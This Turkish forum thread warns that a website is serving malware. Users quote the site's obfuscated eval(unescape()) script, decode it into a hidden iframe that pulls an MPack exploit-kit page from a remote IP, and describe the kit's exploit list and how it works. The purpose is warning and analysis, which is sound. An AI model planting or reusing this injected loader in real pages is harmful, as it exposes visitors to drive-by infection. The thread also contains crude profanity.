folder Tahribat.com Forumları
linefolder Virüs - Trojan - Keylogger - BotNet
linefolder Sevmiyorum Böyle Konuları Ama Uyarayım Dedim.



Sevmiyorum Böyle Konuları Ama Uyarayım Dedim.

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    yellowstar
    yellowstar's avatar
    Kayıt Tarihi: 15/Haziran/2006
    Erkek
    müritler biliyosunuz ayyıldız eziklik yaşadıktan sonra belini düzeltemedi. Ben az önce bakim şu siteye dedim, belki ezikliğe devam ederler diye ayyildiz adresine girdim amk kaspersky paso virüs uyarısı veriyo şaşırdım engelledim, yine lamerlik peşinde sanırım, söylemedi demeyin, siteye girerseniz antivirüs firewall filan açık tutun derim. Beni teyit edin bakem :-)
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    B0LDPiL0T
    B0LDPiL0T's avatar
    Kayıt Tarihi: 09/Haziran/2007
    Erkek

    Hacı bu olay artık çok yaşanmaya başladı, ben genelde yabancı çok siteleride geziyorum ve denk gelebiliyor. sanırım bu işi yapanların amacı prorat, turkojen v.s gibi serverları yedirmek değil yada siktiribokdan bi keyloggerı.

    Siteye bakmadım ama irc trojanı denilen botlardandır büyük ihtimalle...


    Kendine özgü fikir ve görüşü olmayıp, sadece başkalarının ağızlarının içine bakarak yorum yapabilmek nasıl bir duruştur, nasıl bir kişilik profilidir hiç anlayamamışımdır.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    yolbulucu
    yolbulucu's avatar
    Kayıt Tarihi: 06/Nisan/2007
    Homo

    <script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>

     bi script var. comodo uyarmadı ... 


    Erkek olursa Esat Oktay, kız olursa Sabiha Gökçen
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    B0LDPiL0T
    B0LDPiL0T's avatar
    Kayıt Tarihi: 09/Haziran/2007
    Erkek
    document.write("<iframe src=\"http://81.95.150.82/mpack/index.php\" width=0 height=0 style=\"display:none\"></iframe>");
    window.status=" ";

    unescape içindeki hexlerin decode edilmiş hali...


    Kendine özgü fikir ve görüşü olmayıp, sadece başkalarının ağızlarının içine bakarak yorum yapabilmek nasıl bir duruştur, nasıl bir kişilik profilidir hiç anlayamamışımdır.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    B0LDPiL0T
    B0LDPiL0T's avatar
    Kayıt Tarihi: 09/Haziran/2007
    Erkek

    MPack is a PHP-based malware kit produced by Russian hackers

    hacılar şimdi ben decode edilen adrese bakmadım ama sanırım bi piçlik var bu işte.... mpack ile ilgi linkler.

    http://en.wikipedia.org/wiki/MPack_(software)

    http://isc.sans.org/diary.html?storyid=3015

    http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.html

    galiba güncel exploitler bulaştırılıp pc kontrol ediliyor....


    Kendine özgü fikir ve görüşü olmayıp, sadece başkalarının ağızlarının içine bakarak yorum yapabilmek nasıl bir duruştur, nasıl bir kişilik profilidir hiç anlayamamışımdır.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    B0LDPiL0T
    B0LDPiL0T's avatar
    Kayıt Tarihi: 09/Haziran/2007
    Erkek

    Eğer bu piçlerin kullandığı olay böyle bişeyse türçe açıklamasını buldum. 

    Panda Labs. Uzmanları Mpack adlı yeni bir trojan tespit etti, Trojan bulaştığı makinelere çeşitli virus içerikli yazılımlar indiriyor. Yontem Basit: Saldırgan Trojanı seçiyor ve bilgisayarlara bulaştırmak için kullanıyor. Panda Labs. tarafından verilen rapordaki istatistiklere göre 160.000 bilgisayar Mpack Trojanı tarafından doğrudan etkilendi.Elde edilen bilgi doğrudan Mpack in kendi istatistik eklentisinden sağlandı.

    Trojan bulaştığı makinelerde saldırgana tam kontrol sağlıyor, örneğin bulaştığı makinedeki data geçişini izleme fırsatı tanıyor hatta Saldırgan işletim sistemine yada tarayıcısına göre trojanın bulaştığı makineleri grup grup ayırabiliyor.

    Çeşitli forumlarda Paket 700$ dan satılıyor. Ayrıca Bu ücrete 1 yıllık destekde dahil.
    Panda Labs. ın Teknik Bölüm yöneticisi Mr. Luis Corron'a göre "Kullanıcılar Mpack in ilerde zararsız hale gelmesini umut etsinler" Örneğin Güncellemeler. Bu Güncellemeler Mpack in çeşitli versiyonlarına dayanır , nede olsa exploitlerin yeni açıkları keşfetmeye ihtiyacı vardır.Her ay yeni bitane çıkması gayet normal ve ücretleri 50$ ile 150$ arasında değişir.
     
    300$ ödeyerek DreamDownloader ı satın alabilirsiniz, Dreamdownload Trojanları download etmek için bir araçtır. Birinin -be yada worm- kelimeleri ile başlayan dosyaları herhangi biyere yüklemesi Dreamdownloader için yeterlidir ve dosyayı kolayca indirilebilir hale getirir.
     
    Mpack Trojan Paketi ve Dreamdownloader : İlki Saldırgan tarafından seçilen trojanın Bilgisayarlara bulaşmasını sağlar , ikincisi ise trojan yaratma görevi görür.

     

    Kaynak: http://tr.zone-h.org/content/view/241/9/


    Kendine özgü fikir ve görüşü olmayıp, sadece başkalarının ağızlarının içine bakarak yorum yapabilmek nasıl bir duruştur, nasıl bir kişilik profilidir hiç anlayamamışımdır.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    inside
    FireX
    FireX's avatar
    Bilgi/Destek Madalyası Üstün Hizmet Madalyası
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    Internet Explorer 7 kullanın. 6'da büyük riskler var.

    λ
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    B0LDPiL0T
    B0LDPiL0T's avatar
    Kayıt Tarihi: 09/Haziran/2007
    Erkek

    şimdi bu siktimin olayı böyle bulaşıyo sanırım. ve o anda kullandığınız uygulamalar winamp, quicktime, browser açıkları v.s kullanarak sisteminize trojan bulaştırıyor. bu mpack inde versiyonları vamış mesela v90 da bu açıkları kullanarak sizlere zarar veriyor.

    - Modified MS06-014 with the maximized efficiency
    - MS06-006 under Firefox 1.5.x and Opera 7.x
    - unnamed 0day for Win2000 (ms06-044)
    = XML overflow under XP \2k3 with a delay on operation
    = WebViewFolderIcon overflow
    = WinZip ActiveX overflow
    = QuickTime overflow
    = ANI overflow 

     


    Kendine özgü fikir ve görüşü olmayıp, sadece başkalarının ağızlarının içine bakarak yorum yapabilmek nasıl bir duruştur, nasıl bir kişilik profilidir hiç anlayamamışımdır.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    B0LDPiL0T
    B0LDPiL0T's avatar
    Kayıt Tarihi: 09/Haziran/2007
    Erkek

    6.post olu galiba umarım bokunu çıkarmadım. :)

    şimdi gençlik tamamiyle bu siktimin olayını açıklayım size.
    eğer siz bu tarz bir adrese tıkladığınızda yada girdiğiniz
    herhangibir sayfada iframe içerisinde mpack olayı çalışıyorsa
    ilk olarak hangi exploitin sisteminizde çalıştırılabileceğini saptıyor.
    eğer exploite karşı savunmasızsanız iseniz exploit çalışıyor ve daha sonra
    başka bir modülüde size çalıştırılmak üzere bir exe gönderiyor. olay bundan ibarettir :)))

    hatta bunu kullanan adamlar hangi iplerin, ülkelerin, browserların ve işletim sistemlerine
    bulaştığına dair istatistik bile tutuyolar.


    Kendine özgü fikir ve görüşü olmayıp, sadece başkalarının ağızlarının içine bakarak yorum yapabilmek nasıl bir duruştur, nasıl bir kişilik profilidir hiç anlayamamışımdır.
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SilenC3
    SilenC3's avatar
    Kayıt Tarihi: 09/Mart/2007
    Erkek
    o deilde aqdnz sayfanın :D

    Ben giderken sen dönüyodun, sen benden daha fazla şey bilirsin vs.
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    invisible_1905
    invisible_1905's avatar
    Kayıt Tarihi: 09/Mart/2007
    Erkek

    FireX bunu yazdı:
    -----------------------------
    Internet Explorer 7 kullanın. 6'da büyük riskler var.
    -----------------------------

    Mozilla Fire Fox ;) 


    TIGER şimdi asker 87/2/B Tankçı (www.divxhome.net) Herkesi bekleriz.
Toplam Hit: 2026 Toplam Mesaj: 14